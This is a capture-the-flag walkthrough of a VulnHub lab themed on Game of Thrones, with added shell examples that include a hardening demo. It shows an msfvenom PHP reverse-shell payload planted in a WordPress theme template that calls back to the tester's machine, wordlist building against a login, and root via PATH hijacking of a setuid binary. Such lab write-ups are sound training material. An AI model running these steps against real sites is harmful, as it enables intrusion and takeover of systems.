A new challenge for all of you guys!
This CTF is all about conquering the flags that come our way as we go further into our penetration test of this lab. All flags are to be discovered in the form: Country name Flag:[md5 hash]. The network interface of this virtual machine takes its IP settings from DHCP.
Download the lab from here: https://www.vulnhub.com/entry/usv-2016-v101,175/
Let’s get started with our first step.
netdiscover
This ARP sweep of the local network gives us our target IP.
Target IP: 192.168.0.103
Now we scan it with nmap, which gives us all the open ports on this lab for further testing.
nmap -p- -A 192.168.0.103
The result shows that the following ports are open: 22, 80, 3129, 3306 and 21211, and that an HTTP proxy is listening on port 3129.
So now let's proceed with further testing. First we'll try SSH on port 22.
ssh 192.168.0.103
SSH reveals an ASCII dragon with some strings and a base64 string at the bottom (this is the server's pre-authentication banner, so no credentials are needed to see it). Looking closer you'll see AES-ECB written at the top.
A Google search turned up a website called aesencryption.net where the base64 ciphertext from the banner can be decrypted with the key given in the image. Doing so gave us our 1st flag, i.e. the ITALY FLAG.
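An offline alternative to pasting the ciphertext into a third-party website (a habit worth breaking, since whatever you paste there leaves your hands): openssl decrypts AES-ECB directly. This is an added example, not part of the original write-up. The key from the banner image is not reproduced on this page, so 'winterfell' below is a placeholder passphrase, and the way the website turns a short passphrase into a 16-byte AES-128 key is assumed here to be zero-padding (an assumption; if the real key is already 16 bytes it makes no difference). The block round-trips a constructed plaintext so it runs without the lab.

```sh
# Added example: decrypt an AES-ECB/base64 blob with openssl instead of a
# website. Assumptions: AES-128, key = ASCII passphrase zero-padded or
# truncated to 16 bytes. The passphrase and flag below are placeholders.

# Turn an ASCII passphrase into the 32-hex-digit raw key that openssl -K expects.
key_to_hex() {
  hex=$(printf '%s' "$1" | od -An -tx1 | tr -d ' \n')
  printf '%.32s\n' "${hex}00000000000000000000000000000000"
}

# Decrypt: base64 ciphertext on stdin, raw hex key as $1, plaintext on stdout.
# Newlines are stripped first because -A expects the base64 on a single line.
aes_ecb_decrypt() {
  tr -d '\n' | openssl enc -d -aes-128-ecb -K "$1" -a -A
}

# Encrypt helper, only so the example can build its own test vector.
aes_ecb_encrypt() {
  openssl enc -aes-128-ecb -K "$1" -a -A
}

# Round trip on a constructed flag (the hash is a placeholder, not the lab's).
roundtrip_demo() {
  key=$(key_to_hex 'winterfell')
  plain='Italy Flag:[0123456789abcdef0123456789abcdef]'
  printf '%s' "$plain" | aes_ecb_encrypt "$key" | aes_ecb_decrypt "$key"
}

# Against the real banner: put the base64 line in $blob and the key in $pass, then
#   printf '%s' "$blob" | aes_ecb_decrypt "$(key_to_hex "$pass")"
```

If openssl reports a bad decrypt, the key-derivation assumption is what to revisit first: try the key exactly as given in the image, or a 256-bit variant (-aes-256-ecb with 64 hex digits).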
OK, so now let's head towards the second flag. For that we open the target IP in the browser, as port 80 is also open. Look at that: 403 Forbidden. No result.
While opening the target IP in the browser we captured the request and its response, cookies included, through Burp Suite after setting the manual proxy in the browser. Once the intercepted traffic shows up, right-click in the intercept window; an action list appears, from which we click Send to Repeater.
Look at the screenshot below: you will find two panels, left and right, for the request and the response respectively. In the response window the highlighted text is our flag.
As this value is base64 encoded, we decode it with the HackBar plugin in Mozilla Firefox, which comes preinstalled or can be installed easily. Decoding it gives us our second flag, i.e. the CROATIA FLAG.
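The same check, scripted, as an added example that is not from the original post: scan every header line of a captured response, cookies included, for base64-looking tokens, decode each one and keep whatever matches the lab's flag format. The response below is constructed for the example, and the hash in it is a placeholder, not the Croatia flag.

```sh
# Added example: find base64-encoded flags hidden in HTTP response headers.
FLAG_RE='^[A-Za-z ]+ Flag:\[[0-9a-f]{32}]$'   # "Country name Flag:[md5 hash]"

# Constructed stand-in for the 403 response seen in Burp (placeholder hash).
CONSTRUCTED_FLAG='Croatia Flag:[0123456789abcdef0123456789abcdef]'
SAMPLE_RESPONSE="HTTP/1.1 403 Forbidden
Server: Apache
Set-Cookie: flag=$(printf '%s' "$CONSTRUCTED_FLAG" | base64 | tr -d '\n'); path=/
Content-Type: text/html; charset=UTF-8

<html><body>Forbidden</body></html>"

# Reads a raw response on stdin; prints every header token that decodes to a flag.
# The header block ends at the first blank line, so the body is never scanned.
flags_in_headers() {
  sed '/^[[:space:]]*$/q' \
  | grep -oE '[A-Za-z0-9+/]{16,}={0,2}' \
  | while IFS= read -r token; do
      decoded=$(printf '%s' "$token" | base64 -d 2>/dev/null) || continue
      printf '%s\n' "$decoded" | grep -aE "$FLAG_RE" || true
    done
}

# Usage with a response saved from Burp or curl -i:
#   flags_in_headers < response.txt
```

Tokens shorter than 16 characters are skipped on purpose; header values like charset names and short cookie IDs would otherwise decode to garbage and produce noise.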
Moving ahead, our nmap result told us that an HTTP proxy is listening on port 3129, so we point the browser's proxy settings at the target IP and port 3129, as shown below.
Now try opening the target IP in the browser and wait a few seconds, about 10. The proxy setting did the trick: the website reveals a single page with a rotating banner of "WINTER IS COMING" and "ALL MEN MUST DIE". Some of you may be aware of this, but for those who don't know, it is Game of Thrones. (The 403 we got earlier most likely comes from an access rule that only admits requests arriving through the box's own proxy; going through it makes our requests look local.)
The site didn't show much, so I ran the nikto scanner through the proxy to get some information about it that will be helpful in further testing.
nikto -h 192.168.0.103 -useproxy http://192.168.0.103:3129
It reveals a WordPress login at /blog.
OK! Now open it in the browser. Great, the Game of Thrones notion is confirmed, as a Seven Kingdoms blog is shown.
Scrolling down this site you can see an interesting second post which says 'I have a message for you'. There is a highlighted link, so just open it in the browser.
Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it. Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at the bottom.
Decoding the string in the HackBar plugin gives another flag. From this step we got our third flag, i.e. the PORTUGAL FLAG.
Now, returning to the site, there are several posts which are all useless, so just scroll down to see if there is something useful or not, and then comes the last post, which is of interest to us:
'Protected: the secret chapter'
Oh! We have to provide a password to get through it. This one took some time, and to spare your time I won't go through my failures. I created a dictionary of possible passwords, which are nothing but words taken from the pages of this blog, with the following cewl command (-d 2 crawls two links deep, -m 5 keeps only words of at least five characters, and the --proxy_host/--proxy_port options send the crawl through the proxy on port 3129, without which the site is not reachable):
cewl -d 2 -m 5 --proxy_host 192.168.0.103 --proxy_port 3129 -w /root/Desktop/dict.txt http://192.168.0.103/blog/
From that list we find that the password is 'westerosi'.
Using this password we got to another page, which revealed another flag as a base64 encoded string and, below it, some images of an actress.
Decoding it as before gives our fourth flag, i.e. the PARAGUAY FLAG.
Moving one level up on the site, we got another message: "the mother_of_dragons has a password which is right in front of your eyes".
Knowing nothing about the eyes of the actress, I resorted to Google to see if I could get any clue there, but no such luck.
I looked at the message again, and it states 'password which is in front of your eyes'. So the password of mother_of_dragons is 'in front of your eyes'. But wait a minute, where is this password used?
We have an FTP service running on port 21211, so let's try to get in with it. Note the -a in ls: the file we want is a dotfile, which a plain ls would not show.
ftp 192.168.0.103 21211
ls -al
get .note.txt
exit
cat .note.txt
Bingo! Here that password is used. At the bottom, the result says that the children's names are used for a password. Again a password, but this time it is for the WordPress login, which we are going to use in the coming steps.
Again I googled and found out she didn't have any children but rather three dragons, named Drogon, Rhaegal and Viserion. So I put all these names into a file along with all possible combinations of them.
The list is small, so by entering each one by hand the desired password can be found.
The password is RhaegalDrogonViserion.
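Both wordlists used so far, the cewl-style one scraped from the blog pages and the hand-built list of dragon-name orderings, can be produced with a few lines of shell. This is an added example, not the author's own script: the HTML snippet is constructed, and the word extraction is a simplified version of what cewl does (strip tags, split on non-letters, keep words of at least -m letters, deduplicate); it does not follow links the way cewl -d 2 does.

```sh
# Added example: build the two candidate wordlists from this write-up.

# Constructed stand-in for a blog page (not the lab's real HTML).
SAMPLE_HTML='<html><body><h1>Seven Kingdoms</h1>
<p>I have a message for you, westerosi. Winter is coming.</p>
<p class="protected">Protected: the secret chapter</p></body></html>'

# cewl-style extraction: strip tags, split on non-letters, keep words of at
# least $1 letters (cewl -m), one per line, deduplicated.
words_from_html() {
  minlen=${1:-5}
  sed 's/<[^>]*>/ /g' \
  | tr -cs 'A-Za-z' '\n' \
  | awk -v m="$minlen" 'length($0) >= m' \
  | sort -u
}

# Every ordering of the given names, concatenated ("all possible combinations").
name_permutations() {
  _permute '' "$@"
}
_permute() {
  local prefix=$1 n m rest
  shift
  if [ $# -eq 0 ]; then
    printf '%s\n' "$prefix"
    return
  fi
  for n in "$@"; do
    rest=''
    for m in "$@"; do
      [ "$m" = "$n" ] || rest="$rest $m"   # the names not yet placed
    done
    _permute "$prefix$n" $rest             # word-splitting $rest is intended
  done
}

# Usage:
#   printf '%s' "$SAMPLE_HTML" | words_from_html 5 > dict.txt
#   name_permutations Drogon Rhaegal Viserion > dragons.txt
```

Three names give six orderings; add lowercase and separator variants only if the plain list fails, since each variant multiplies the login attempts you make against the site.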
Apply the credentials to WordPress and we are in!
Looking around the site I found the profile section, which reveals a base64 encoded string for mother_of_dragons.
As always, decode the base64 string in HackBar and here we have another flag. This is our fifth flag, i.e. the THAILAND FLAG.
Now, with only 2 flags left, it's time for shell access, as we have WordPress admin.
First, generate PHP code with msfvenom that will give us a meterpreter session (192.168.0.104 is our Kali machine, the address the payload connects back to):
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw
Being admin of the site, I am able to edit the theme, so I replaced the 404.php template of the Viking theme with the PHP code above. Any request that makes WordPress render that theme's 404 page (a URL that does not exist, for instance) then executes the payload.
On the other side, to receive the meterpreter session, open a Kali terminal and run the multi handler with the following commands. Note that LHOST here is our own address (the one given to msfvenom), not the target's, and that msfconsole's set takes a space, not an equals sign:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 4444
exploit
Once we have the meterpreter session, drop to a shell and upgrade it to a proper TTY with the following commands:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
cd /srv/http
ls
It shows a reward_flag.txt file, so read it with cat:
cat reward_flag.txt
As a result we get a base64 encoded string. Don't worry, this decoding business is almost over; decoding this one gives our sixth flag, the MONGOLIA FLAG.
Back to another file in the listing above: winterfell_messenger. We see it is executable, owned by root and setuid, so whatever it runs, runs as root. Run it with the following command:
./winterfell_messenger
cat: /root/message.txt
The output shows that it is using the cat command to read a file in the /root directory.
Running strings on the binary confirms that cat is invoked; however, it is not using the full path to the program. From this we know that the shell it spawns will search the directories in PATH, in order, for a program called cat and run the first one it finds.
Since we can change PATH with export, we first need a writable directory, and /tmp will do. In /tmp we create an executable named cat, so that it is the one winterfell_messenger ends up calling. Because it runs as root, we have it call /bin/bash, which gives us a root shell (if that shell comes up as the unprivileged user instead, the binary only raised the effective uid and bash dropped it again; /bin/bash -p keeps it). Run the following commands:
echo "/bin/bash" > /tmp/cat
chmod 777 /tmp/cat
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
After this step we prepend the /tmp directory we used to PATH, so that it is searched before the directories holding the real cat. For this, type the following command:
export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
Now go to the home directory of the web server to get to the binary. For that, type:
cd /srv/http
ls
Now call the winterfell_messenger file with the command below, and check who we are:
./winterfell_messenger
id
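The whole escalation, reproduced as an added example you can run on any Linux box as an unprivileged user (this is not the author's code and does not need the lab): a stand-in for winterfell_messenger resolves cat through PATH exactly as the binary does, a planted cat in a scratch directory takes its place, and a hardened stand-in shows the two fixes that defeat the trick, an absolute path plus a PATH the caller does not control. The setuid bit is deliberately left out so the demo is safe to run; with it, the planted command would run as root just as in the lab.

```sh
# Added example: PATH hijacking against a program that calls "cat" without a
# full path, beside the hardened version. Runs unprivileged; no setuid involved.

# Stand-in for winterfell_messenger: a shell resolves cat through PATH,
# exactly what happens when a binary runs system("cat /root/message.txt").
victim_unsafe() {
  sh -c 'cat "$1"' victim "$1"
}

# Hardened stand-in: absolute paths for the shell and for cat, and a PATH the
# caller cannot influence for anything the program might spawn later.
victim_hardened() {
  PATH=/usr/bin:/bin /bin/sh -c '/bin/cat "$1"' victim "$1"
}

# Plant the fake cat in a writable directory (the lab's version was:
# echo "/bin/bash" > /tmp/cat; chmod 777 /tmp/cat).
plant_fake_cat() {
  printf '#!/bin/sh\necho HIJACKED\n' > "$1/cat"
  chmod 755 "$1/cat"
}

# Run both victims with the scratch directory first in PATH (the lab's
# export PATH=/tmp:...). Prints what each victim's "cat" produced.
hijack_demo() {
  work=$(mktemp -d)
  printf 'secret message\n' > "$work/message.txt"
  plant_fake_cat "$work"
  PATH="$work:$PATH" victim_unsafe "$work/message.txt"     # prints HIJACKED
  PATH="$work:$PATH" victim_hardened "$work/message.txt"   # prints secret message
  rm -rf "$work"
}

hijack_demo
```

The unsafe victim never notices anything is wrong: the planted file is simply the first cat on the search path. The hardened one is immune both because /bin/cat is named outright and because its PATH is reset to system directories, so even a helper it spawned later could not be redirected the same way.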
Now go to /root, and there we have a .flag.txt file.
Running cat against .flag.txt gives a congratulations, a wolf made of ASCII characters and a base64 encoded string at the bottom. Note the full path to cat: with /tmp first in PATH, a bare cat would run our fake one and spawn yet another shell. The commands are given below.
cd /root
/usr/sbin/cat .flag.txt
Finally, decoding in HackBar reveals the seventh and last flag, which is none other than the SOMALIA FLAG.
Voila! We reached the end, and with this the job is done. Hope you enjoyed it, and that your penetration testing skills have been refreshed.